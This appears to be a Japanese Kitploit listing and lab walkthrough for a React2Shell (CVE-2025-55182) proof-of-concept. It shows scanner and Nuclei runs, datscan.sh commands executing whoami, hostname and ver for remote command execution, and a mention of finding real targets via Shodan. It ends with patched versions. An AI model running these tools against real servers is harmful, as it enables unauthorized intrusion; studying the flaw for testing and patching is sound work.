Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React2Shell-PoC-CVE-2025-55182 — # CVE-2025-55182 (React2Shell) RCE 脆弱性の概念実証エクスプロイト React Server Components における CVE-2025-55182 (React2Shell) RCE 脆弱性の概念実証エクスプロイトです。脆弱なホストを検出するスキャナーと、リモートコマンド実行用のシェルスクリプトが含まれています。許可されたセキュリティテストおよび教育目的のみに使用してください。 | Kitploit
ツール/GitHubGitHub/eagle-nett/react2shell-poc-cve-2025-55182
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubeagle-nett/react2shell-poc-cve-2025-55182

React2Shell-PoC-CVE-2025-55182

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

# CVE-2025-55182 (React2Shell) RCE 脆弱性の概念実証エクスプロイト React Server Components における CVE-2025-55182 (React2Shell) RCE 脆弱性の概念実証エクスプロイトです。脆弱なホストを検出するスキャナーと、リモートコマンド実行用のシェルスクリプトが含まれています。許可されたセキュリティテストおよび教育目的のみに使用してください。

リポジトリを見る
15ヶ月前未レビュー

React2Shell(CVE-2025-55182)のエクスプロイトシミュレーション

注意:

  • このドキュメントは学習およびセキュリティ研究目的のみです。
  • 許可なくシステムを攻撃するために使用しないでください。

1. 概要

CVE-2025-55182は、React2Shellとも呼ばれ、React Server Components(RSC)に影響を与える深刻なリモートコード実行(RCE)脆弱性です。これは、Flightプロトコルを使用してクライアントとサーバー間で通信します。クライアントがデータを要求すると、サーバーはペイロードを受信し、それを解析します。これにより、攻撃者が悪意のある構造や任意のコードスニペットを注入し、Reactが有効と受け入れる可能性があります。

項目内容
深刻度Critical(CVSS 10.0)
タイプUnsafe Deserialization(CWE-502)
攻撃手法リモート、認証不要
影響を受けるバージョンReact: 19.0.0、19.1.0、19.1.1、19.2.0 および Next.js: 15.0.0 – 15.0.4、15.1.0 – 15.1.8、15.2.0 – 15.2.5、15.3.0 – 15.3.5、15.4.0 – 15.4.7、15.5.0 – 15.5.6、16.0.0 – 16.0.6

2. 原因

サーバーはクライアントからのペイロードを適切に検証せずに処理するため、攻撃者は以下を実行できます。

  • 悪意のあるペイロードの注入
  • サーバー上でのコード実行
  • 認証前の脆弱性であるため、ユーザー認証なしでのエクスプロイト

この脆弱性に関するエクスプロイト活動は2025年12月5日から確認されています。成功したエクスプロイトのほとんどは、攻撃グループによる評価に起因しています。Windows環境とLinux環境の両方が影響を受けます。

3. 実験

インストール

root@kitploit:~
pip install -r requirements.txt

脆弱なサーバーをスキャン:

root@kitploit:~
python3 scanner.py -u https://example.com

スキャンするパスを入力(ここでは自身の脆弱なマシン http://192.168.10.1:3000 を入力)

image

取得結果:

image
root@kitploit:~
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

さらに、エクスプロイトの目的に応じてスキャンすることも可能:

ホストリストのスキャン:

root@kitploit:~
python3 scanner.py -l hosts.txt

マルチスレッドでスキャンし、結果を保存:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

カスタムヘッダーでのスキャン:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Windowsターゲットのスキャン:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

安全なサイドチャネル検出方法の使用:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check
image

ご覧のとおり、セキュリティ脆弱性が発生しています。つまり、提供するサーバーが攻撃者に対して脆弱であることを意味します。


Nuclei

ここでNucleiを使用して、対象サーバーにPOCがある脆弱性が含まれているかどうかを確認します。この機能は、カスタムリクエストを送信し、誤検知を最小限に抑え、並列スキャンをサポートすることで動作します。

root@kitploit:~
nuclei -t scan.yaml -u http://192.168.10.1:3000

取得結果

root@kitploit:~
[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

システムはこのサーバーが脆弱であり、CVE-2025-55182の脆弱性によってエクスプロイト可能であることを検出しました。そして、ソーシャルプラットフォーム上に多数のPOCが存在する、かなり危険で重要な脆弱性であることがわかります。 ☺☺☺

4. エクスプロイト方法

この情報だけで、アプリケーションにセキュリティ脆弱性が存在することを確認するのに十分です。このアプリケーションが悪用されてリモートでコマンドやコードが実行される可能性があることを証明するために、PoCを開始します。

root@kitploit:~
chmod +x scanner.sh

使用方法

root@kitploit:~
# 対象が脆弱かどうかを確認
./datscan.sh -d example.com

# 現在のユーザーを確認するコマンドを実行
./datscan.sh -d example.com -c "whoami"

# 完全なURLを使用
./datscan.sh -d example.com -c "uname -a"
image

意味:

サーバープロセスを実行している現在のユーザーを返します

これにより以下を特定できます:

  • アプリケーションがどのユーザー権限で実行されているか
  • 権限レベル(低権限か管理者か)

=> RCEが成功したことを確認するための最も基本的なコマンドです。

Note

  • -d, --domain - ドメイン/URL
  • -c, --command - 実行するコマンド(例: whoami, hostname,...)

例

root@kitploit:~
# ホスト名を確認
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# オペレーティングシステムのバージョンを確認
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# コマンド実行が安定して動作するか確認
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"

実行後のイメージ

image

これはエクスプロイト成功後の初期調査のステップです。

RCEが動作していること、OSの特定などを確認できます。

注意

この実験は、法的な問題を避けるために個人のラボ環境でデモを行っています。そのため、HTTPヘッダーを使用したデータの盗み出し、大規模な出力、特殊文字などは以下の問題を引き起こす可能性があります:

  • ERR_INVALID_CHAR
  • 応答の減少
  • タイムアウト
image

短いコマンド(例: whoami、ver)は、テスト環境でのデモンストレーションにおいてより信頼性があります。

もし望むなら、Shodanを使用して実際の環境のIPアドレスを直接確認し、上記の実験と同様にエクスプロイトすることも可能ですが(推奨しません)。

image

前述したように、このツールは教育および許可されたセキュリティテストの目的のみです。所有していない、またはテスト権限のないシステムでこのツールを使用しないでください。

5. 脆弱性の修正方法

  • クライアントからのデータを信頼しない
  • 入力を厳密に検証する
  • バージョンの更新
    • React: >= 19.0.1 / 19.1.2 / 19.2.1
    • Next.js: >= 15.0.5 / 16.0.7

6. 参考資料

  • CVE-2025-55182 – https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • CVE-2025-55182 - https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/
ツールをダウンロード
実行コマンドの意味内容
ホスト名を返す使用目的:
- 影響を受けるシステムの識別
- 内部環境での水平移動に利用
OSバージョンを確認重要:
- 特権昇格の可能性の評価
- 適切なエクスプロイトの選択
コマンド実行の確認ペイロード/スキャナのデバッグに使用
現在のユーザー名を返すこの場合:
- ユーザーがADMINの場合→高い権限を持つ可能性
- 一部のWindowsケースではwhoamiよりも重要
ホスト名を返す環境変数を通じてホスト名を返す